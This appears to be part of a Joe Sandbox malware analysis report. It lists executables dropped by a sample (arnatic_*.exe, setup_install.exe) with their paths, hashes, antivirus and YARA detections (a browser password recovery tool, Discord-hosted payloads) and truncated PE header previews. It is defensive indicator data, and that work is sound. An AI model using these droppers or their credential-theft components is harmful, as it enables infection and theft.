SHA-512:	75B3467BC465E7AC9841E6A742A21373F2A044C0266C388B7BB63331ACEE73E05EAA329E4B3A700FF1EEF0C85D84F128D72D119B5018A1B29C88E29B8589D8EA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...................0.............>.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......$7..........PD......t...................................................g.......y....(.E...s.?...W.......(i...f....(j...r7..p(....(k...f....ol...(m...ol...on....sCD...\|...f....ol...r.#.p(....on...f....o....r.#.p(....on...f....o....rO$.p(....(k........o....r.$.p(....r...p(....r-..p(....(....on...f....o....r4%.p(....(k...f....o....rv%.p(....(k...f....o....r.&.p(....(k...f....o....rk&.p(....(k....~....:#...r.&.p(.....#...(....o....s.........~.....~....*.~

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	49152:7rEOLD0xW+aJVXfxu3Eosp/qw7RV+uY/:023Jtosp/qw7yb
MD5:	DD3C57E2520A47D634E5FAAC52782FDA
SHA1:	73AF831AA23F72D82FE80E84B0C4411E6A9DCCB6
SHA-256:	03B887397102E717DE5EF8A0D4D0374BDF5347A85DDDC8C829714770142B8FDF
SHA-512:	37F0BE02B923B873DAA2CB98A49C42A1AB2DCB3B9A5422E7B5FECFEDF1A90CE2F00E375A41C1C0331A4B3E3B96B5FBDC267907966AA8406DED1970B42F3E622C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i..-..A-..A-..A9..@8..A9..@ ..A9..@...A...@...A...@,..A...@=..A...@'..A...@...A9..@$..A-..A..A...@%..A...A,..A-.pA,..A...@,..ARich-..A........................PE..d......a.........."..................}.........@............................. !...........`.................................................DJ..d........J......`............. ..#.. :..p....................;..(....:..0...............8............................text............................... ..`.rdata...[.......\..................@..@.data........`...^...N..............@....pdata..`...........................@..@_RDATA...............4..............@..@.rsrc....J.......L...6..............@..@.reloc...#.... ..$.... .............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\searchEUunlim[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:Ab0yasxDZDYbVJU9Dwsn/m5eo7CKS6O4gySTePDyB9nb41xqGONesE:AYZKlUbVJeEYu9OVxePmBix/aE
MD5:	6BFC3D7F2DE4A00FAC9B4EC72520209F
SHA1:	0DC92779C7BB4C9D6C3A02FFA176199F652B3976
SHA-256:	B039B93D8CF1911397F74A703784D69363544F97F059266256CBAF419E8B2C3E
SHA-512:	DB92E098F611742A38F4B0BA5C202CE48AD926C51A6396FFEDDBC8C75891F4E104558AF7D9D108CC197BEA3CFFFDEDFFD99A9E24AD481350FA5A71DA8016667B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#X.g9..g9..g9..yk0.v9..yk&..9..@...d9..g9..9..yk!._9..yk1.f9..yk4.f9..Richg9..........PE..L.....L`.................2..........0O.......P....@................................-........................................-..(........~..........................p...............................`...@...............(............................text....0.......2.................. ..`.data.... ...P.......6..............@....bot.........p.......J..............@....zuxi...K............L..............@....tive................N..............@....roduwe..............P..............@....rsrc...............^..............@..@.reloc..8;.......<..................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\search_target1kpd[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	1536:a6x3MUH9LNxYEThBPnt21SnmymczorCtMqvJK2uHjmUKKDfj/RhsN:acL5T78UnmDGJuHjmUKKzrRhs
MD5:	3F13A6A1BBCEC7D68C15DEE4EEB7DF58
SHA1:	9DC2468D6E9E61D572D4C1A54B3C80DD69FF2287
SHA-256:	17D8AA92EB9BDA31A05D0BD15A52734B18AE72C9F4B6EFEF628DD5773E0F71C2
SHA-512:	E1033871C72422E80132C0E5DECE0FCBD0B9279374BC84330A3899DFFE5E94D5AFD637D45C0949D7FB775EFE07A195CB924FA9D099D2AF1A660B9A80F08807EF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ntu..............G..-....G.......G..b...-.`..............G.......G.......G......Rich............PE..L...!.._......................w...................@..........................pw.............................................t...<.....v.................................................................@............................................text............................... ..`.rdata..x...........................@..@.data...$.s.........................@....joy..........v......@..............@..@.rsrc.........v......L..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\setup[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:HCA2YLo85KNa/jA6p8MIQfJFDrJoYkLLTE:HX2ImN4F2MTJFBoY04
MD5:	913FC52D517A4B4B2BE78103184EF87E
SHA1:	5ECF0E1AF77F229C46F13B9C4FB6341761ECD818
SHA-256:	734D3D7D77B4FAD43FF22B081E664D6CFEE09C67AEC8F81CFA524924CB7785FA
SHA-512:	1881476719098573F618A4FFB21EC6729E8B72A869AAE7D959EAF49DF5A085208F1DADFBA71ACC71A4FCCE5046FE2863A7C19EEBA04A36F13564059B23E60733
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L..../._............................P.............@..................................p......................................t...P.......(...............................................................@...............L............................text............................... ..`.data...............................@....ruceg..............................@....todako.............................@....godol..............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\27f_1401[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:rfIvzk/CDajDJO4kUDdfL5Br+j6aSTJQPuh/ZnE1hZ0DQUiBs6wQkcI3JIee7H:rIv46OHgUDdD5MjXSTJwuhBnE1L0DQUA
MD5:	BF2EACD3AC9C12709881AA852DC60358
SHA1:	EEBE60C4775143199D1EB1F63D48675B45CCC289
SHA-256:	48B201629679F0E035CA613F27B1170CBEC03FC7975A5A6D789DCF6B8B926526
SHA-512:	E116F250E6CFEC842AC62DFC37FA8135BDDBC854FEF4D87C54DE876A384E52ACEF18D22703F4AC83C5EF82EA9AB1E5DD0A935C574F0B5AE8FF8A28B55AC026E3
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%..........................................}.....'..).P.%..P.............................................8g.Q\|...\|...\|...bTZ.f...bTL.....[.......\|.......bTK.F...bT[.}...bT^.}.......\|..........................+.........}........m...1......-#...................................................................................Iv..........%......................q........................................................................................r.......m..............................T...........i................].............M........................]........w....}........................]............m........................]........%n...................................'........?....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\HR[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:8Qi3uAIKMYqN96m6UR0IrELWKlVwlpkTyL6Ka3EjiqxyNefotS10m:8Qi+PvNgHIALfGHkTVwiPk4Bm
MD5:	3A9664DAD384F41DCDC1272ED31171E0
SHA1:	D525F290DCF469F5B26654A4DB685092F8616509
SHA-256:	A85903FC9F06B4CCC4136FC573F6AFDFB6B90D555530F7259E4E8CB18616B724
SHA-512:	F7C3E6D561DF34C63E373C6CC715E1C13AB68013360F1694EEFAE6C896345ABD1135E60B5AA5D96FFD245AB7D24C9D856A7EAB58C9798D3B7B355E9DE1618300
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@.......................................@......@..............................P...................................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\redcappes_crypted[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	98304:1K7AC3AO28pjeXPl8XlY9tBe0Mle44y4I:UlQz8paflsYzBfMlx4VI
MD5:	07F5A548B1C79C6FCE9EEBA1A13CA8D4
SHA1:	3C6459995AB858E5C0283B62A904F91E64CF111F
SHA-256:	FCA4E91292EAE5B06BCFFDFDCB043346996A74BE2686C9C2E3CB9FF517E59110
SHA-512:	3F95790701C20BB631B9A7CFDD5A99F1BC10862703F142D0F16EC80BEFAFD804B1B261719999B105FFC6E62575875F9054915F592645A3783D5C4AE21DB27C14
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%................................................'..).P.%..P...................................................g.}.........}..........................................................M.....................................................?................................................................................................................................................}......................................}.........m.........................}......................................}........c............................}.........M.......k....................}.........-......9....................}.......-......-....................}.............]......{................}....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	729724
Entropy (8bit):	7.767862089624224
Encrypted:	false
SSDEEP:	12288:CcXe9SLN+NH0khUZY+vcvw15G8QYewwB9gL1xB3iJZcaFh:CcO2Q2ZYuIoel9gLHB3yZcaj
MD5:	6E43430011784CFF369EA5A5AE4B000F
SHA1:	5999859A9DDFCC66E41FF301B0EEB92EF0CE5B9F
SHA-256:	A5AB29E6FC308D1FE9FD056E960D7CCD474E2D22FB6A799D07086EC715A89D9A
SHA-512:	33EF732056182B9AB073D2EACFD71D3F1CB969EE038A19336FB5E0263A4E870742082C756A57010A26E7EAB747A2332523D638F2570B8070B933BF957D2DEA96
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........3...`...`...`...`...`...`...`...`...`...`...`..`...`...`...`...`..`..`...`Rich...`........PE..L...0..`.................`...p......d%.......p....@.........................................................................Pz..d.......<............................................................................p.. ............................text...._.......`.................. ..`.rdata..z....p... ...p..............@..@.data....5.......0..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	729724
Entropy (8bit):	7.767862089624224
Encrypted:	false
SSDEEP:	12288:CcXe9SLN+NH0khUZY+vcvw15G8QYewwB9gL1xB3iJZcaFh:CcO2Q2ZYuIoel9gLHB3yZcaj
MD5:	6E43430011784CFF369EA5A5AE4B000F
SHA1:	5999859A9DDFCC66E41FF301B0EEB92EF0CE5B9F
SHA-256:	A5AB29E6FC308D1FE9FD056E960D7CCD474E2D22FB6A799D07086EC715A89D9A
SHA-512:	33EF732056182B9AB073D2EACFD71D3F1CB969EE038A19336FB5E0263A4E870742082C756A57010A26E7EAB747A2332523D638F2570B8070B933BF957D2DEA96
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........3...`...`...`...`...`...`...`...`...`...`...`..`...`...`...`...`..`..`...`Rich...`........PE..L...0..`.................`...p......d%.......p....@.........................................................................Pz..d.......<............................................................................p.. ............................text...._.......`.................. ..`.rdata..z....p... ...p..............@..@.data....5.......0..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	248832
Entropy (8bit):	6.384824159424914
Encrypted:	false
SSDEEP:	3072:jBNmLqpxDPt+pt1VPA9TRtQuTqLWe5fJZhuCQm+1yUVNSmE:tm0yt1VP0guTqFJSbmJUSt
MD5:	68BC76A5DF7A7C5368E8AC9484584825
SHA1:	8523D1CD6709B58F7ACE6EE6F08343DF6BFFDBDF
SHA-256:	E5171BF897A4D8C420708E09D1DB070A185EBAC7010E17AE7695541C383A95DB
SHA-512:	C2320BEE41FFD37CB945AC131578A3F873B4BB5FD6D46BBA6DCEFD061946E3359F7F95D4DB5FA18C20E8DB602AFC8D53824D18AFA6643AAA58A9B2BD2D8C81EE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"0..C^.C^.C^....C^.....C^..%.C^.C_..C^....C^....C^....C^....C^.Rich.C^.................PE..L....?v^......................X...................@...........................Z.....................................0...J.......d.....X......................@Z..... ................................?..@............................................text...z........................... ..`.data...P.V......N..................@....rsrc.........X.....................@..@.reloc...I...@Z..J..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	248832
Entropy (8bit):	6.384824159424914
Encrypted:	false
SSDEEP:	3072:jBNmLqpxDPt+pt1VPA9TRtQuTqLWe5fJZhuCQm+1yUVNSmE:tm0yt1VP0guTqFJSbmJUSt
MD5:	68BC76A5DF7A7C5368E8AC9484584825
SHA1:	8523D1CD6709B58F7ACE6EE6F08343DF6BFFDBDF
SHA-256:	E5171BF897A4D8C420708E09D1DB070A185EBAC7010E17AE7695541C383A95DB
SHA-512:	C2320BEE41FFD37CB945AC131578A3F873B4BB5FD6D46BBA6DCEFD061946E3359F7F95D4DB5FA18C20E8DB602AFC8D53824D18AFA6643AAA58A9B2BD2D8C81EE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"0..C^.C^.C^....C^.....C^..%.C^.C_..C^....C^....C^....C^....C^.Rich.C^.................PE..L....?v^......................X...................@...........................Z.....................................0...J.......d.....X......................@Z..... ................................?..@............................................text...z........................... ..`.data...P.V......N..................@....rsrc.........X.....................@..@.reloc...I...@Z..J..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	625152
Entropy (8bit):	7.547054954032131
Encrypted:	false
SSDEEP:	12288:mjTb2XoEiL2HWXI7xfyhrIMdaQ6mgJ5mpaeyRfo:OTb9SKOfqV4Q/g3mpad
MD5:	208EF3505E28717F9227377DA516C109
SHA1:	FE9D2E9A69268EE0D98A29013F5E6123A0A09C32
SHA-256:	52F5B95AB8E5791BE49A321279D65D57FD65753167ABDD94DD705E3998229570
SHA-512:	C5AC3FB177367E9CE5C7BD1598558BA1D1CE63E517DF2EA92A86D1ED320A3449EE945ACC456CB92816BB76DE206F2583E7659FF9D15A007E0347010181B477D2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"0..C^.C^.C^....C^.....C^..%.C^.C_..C^....C^....C^....C^....C^.Rich.C^.................PE..L...#.N^.................\....X.....G........p....@..........................@`.....M................................j..F...._..d....`^......................._..... ................................?..@............................................text....Z.......\.................. ..`.data...P.V..p...N...`..............@....rsrc........`^.....................@..@.reloc..:M...._..N...<..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	625152
Entropy (8bit):	7.547054954032131
Encrypted:	false
SSDEEP:	12288:mjTb2XoEiL2HWXI7xfyhrIMdaQ6mgJ5mpaeyRfo:OTb9SKOfqV4Q/g3mpad
MD5:	208EF3505E28717F9227377DA516C109
SHA1:	FE9D2E9A69268EE0D98A29013F5E6123A0A09C32
SHA-256:	52F5B95AB8E5791BE49A321279D65D57FD65753167ABDD94DD705E3998229570
SHA-512:	C5AC3FB177367E9CE5C7BD1598558BA1D1CE63E517DF2EA92A86D1ED320A3449EE945ACC456CB92816BB76DE206F2583E7659FF9D15A007E0347010181B477D2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"0..C^.C^.C^....C^.....C^..%.C^.C_..C^....C^....C^....C^....C^.Rich.C^.................PE..L...#.N^.................\....X.....G........p....@..........................@`.....M................................j..F...._..d....`^......................._..... ................................?..@............................................text....Z.......\.................. ..`.data...P.V..p...N...`..............@....rsrc........`^.....................@..@.reloc..:M...._..N...<..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.697202721530063
Encrypted:	false
SSDEEP:	96:CyJOuTNNLXqqCWV2sLZS4kdtKozt15BHf7BKEzNt:C0Tj2qH39Gt35BHsu
MD5:	DBC3E1E93FE6F9E1806448CD19E703F7
SHA1:	061119A118197CA93F69045ABD657AA3627FC2C5
SHA-256:	9717F526BF9C56A5D06CCD0FB71EEF0579D26B7100D01665B76D8FDD211B48BD
SHA-512:	BEAB2F861168AF6F6761E216CB86527E90C92EFC8466D8F07544DE94659013A704FFEAA77B09054F2567856C69DF02434DE7206A81A502B738D14D8F36F0DA84
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.............................4... ...@....@.. ....................................@..................................4..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......L$..H............................................................0..........~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&r...p(.....(....r...p(.......(.....(....~....&...0..q....... ....(.....(....t......r...po.....o....t......o.....s.......o.....o.....o.....o.........,..o.....& ....(................:..W..........aa.......0..........(....o....r...p(.......(.......( ...-.(!...o"......(

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.697202721530063
Encrypted:	false
SSDEEP:	96:CyJOuTNNLXqqCWV2sLZS4kdtKozt15BHf7BKEzNt:C0Tj2qH39Gt35BHsu
MD5:	DBC3E1E93FE6F9E1806448CD19E703F7
SHA1:	061119A118197CA93F69045ABD657AA3627FC2C5
SHA-256:	9717F526BF9C56A5D06CCD0FB71EEF0579D26B7100D01665B76D8FDD211B48BD
SHA-512:	BEAB2F861168AF6F6761E216CB86527E90C92EFC8466D8F07544DE94659013A704FFEAA77B09054F2567856C69DF02434DE7206A81A502B738D14D8F36F0DA84
Malicious:	true
Yara Hits:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.............................4... ...@....@.. ....................................@..................................4..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......L$..H............................................................0..........~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&r...p(.....(....r...p(.......(.....(....~....&...0..q....... ....(.....(....t......r...po.....o....t......o.....s.......o.....o.....o.....o.........,..o.....& ....(................:..W..........aa.......0..........(....o....r...p(.......(.......( ...-.(!...o"......(

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	860160
Entropy (8bit):	6.627703871145996
Encrypted:	false
SSDEEP:	24576:/kRkLis0EC5vKcYE52sYAt2rKzTmExr8:570nFNYwzTLxr8
MD5:	4A1A271C67B98C9CFC4C6EFA7411B1DD
SHA1:	E2325CB6F55D5FEA29CE0D31CAD487F2B4E6F891
SHA-256:	3C33E130FFC0A583909982F29C38BFFB518AE0FD0EF7397855906BEEF3CD993D
SHA-512:	E9FC716C03A5F8A327AC1E68336ED0901864B9629DCFD0A32EFE406CDFC571C1BD01012AA373D2AD993D9AE4820044963A1F4CD2BA7EBE5A4B53B143B7B7A2C2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........v0..c..c..c...b..c...bf..c...b..c...b..cV:.c..c...b[..c...b..c...b..c...b..c..cm..c...b..c...c..c..c..c...b..cRich..c........................PE..L....n.`............................m.............@..........................`............@.....................................P....0...........................l...>..8...................x?.......>..@............................................text............................... ..`.rdata..............................@..@.data....o.......L..................@....rsrc........0......................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	860160
Entropy (8bit):	6.627703871145996
Encrypted:	false
SSDEEP:	24576:/kRkLis0EC5vKcYE52sYAt2rKzTmExr8:570nFNYwzTLxr8
MD5:	4A1A271C67B98C9CFC4C6EFA7411B1DD
SHA1:	E2325CB6F55D5FEA29CE0D31CAD487F2B4E6F891
SHA-256:	3C33E130FFC0A583909982F29C38BFFB518AE0FD0EF7397855906BEEF3CD993D
SHA-512:	E9FC716C03A5F8A327AC1E68336ED0901864B9629DCFD0A32EFE406CDFC571C1BD01012AA373D2AD993D9AE4820044963A1F4CD2BA7EBE5A4B53B143B7B7A2C2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........v0..c..c..c...b..c...bf..c...b..c...b..cV:.c..c...b[..c...b..c...b..c...b..c..cm..c...b..c...c..c..c..c...b..cRich..c........................PE..L....n.`............................m.............@..........................`............@.....................................P....0...........................l...>..8...................x?.......>..@............................................text............................... ..`.rdata..............................@..@.data....o.......L..................@....rsrc........0......................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	168960
Entropy (8bit):	5.751236745493968
Encrypted:	false
SSDEEP:	3072:0F8DeftClWsgBZf98dmu5tcyNH+gL/GxS:E8QCQsIf9Y5SSnG
MD5:	08E6EA0E270732E402A66E8B54EACFC6
SHA1:	2D64B8331E641CA0CE3BDE443860CA501B425614
SHA-256:	808791E690E48577E7F43B9AA055FA0EFB928EF626B48F48E95D6D73C5F06F65
SHA-512:	917554CA163436F4F101188690F34A5AB9DD0CFD99CD566830423B3D67FA1DA3E40F53B388D190FEF9EB3F78B634D3C72330E545219DE7570939A9539F5950F9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..`.........."......l...$...........@... ....@.. ....................... ............@..................................G..S....................................................................................................@..H...........!.AHg.#. .... ......................@....text....i...@...j.................. ..`.rsrc...............................@..@.reloc..............................@..B.................................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.txt Download File
Process:	C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	168960
Entropy (8bit):	5.751236745493968
Encrypted:	false
SSDEEP:	3072:0F8DeftClWsgBZf98dmu5tcyNH+gL/GxS:E8QCQsIf9Y5SSnG
MD5:	08E6EA0E270732E402A66E8B54EACFC6
SHA1:	2D64B8331E641CA0CE3BDE443860CA501B425614
SHA-256:	808791E690E48577E7F43B9AA055FA0EFB928EF626B48F48E95D6D73C5F06F65
SHA-512:	917554CA163436F4F101188690F34A5AB9DD0CFD99CD566830423B3D67FA1DA3E40F53B388D190FEF9EB3F78B634D3C72330E545219DE7570939A9539F5950F9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..`.........."......l...$...........@... ....@.. ....................... ............@..................................G..S....................................................................................................@..H...........!.AHg.#. .... ......................@....text....i...@...j.................. ..`.rsrc...............................@..@.reloc..............................@..B.................................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	157696
Entropy (8bit):	5.817263024080333
Encrypted:	false
SSDEEP:	3072:vz8qB8b+YWRzy5T9Ixj2Q5C2APy1LofKkcf1JcwQe9uJ21tKDW6:vz8Tb+JRzy5TYjB0PPy1LaXM16k9uk1o
MD5:	614B53C6D85985DA3A5C895309AC8C16
SHA1:	23CF36C21C7FC55CAB20D8ECB014F7CCB23D9F5F
SHA-256:	C3818839FAC5DAFF7ACD214B1CA8BFDFA6CE25D64123213509C104E38070F3F9
SHA-512:	440361B70C27EE09A44D8D734E5ABD3C2C2654EA749FD80A8CBADD06A72313284468F9485DAB0CFF0068F7F3325A78442E36E0EC8E110D70F04746736BF220CC
Malicious:	false
Reputation:	unknown
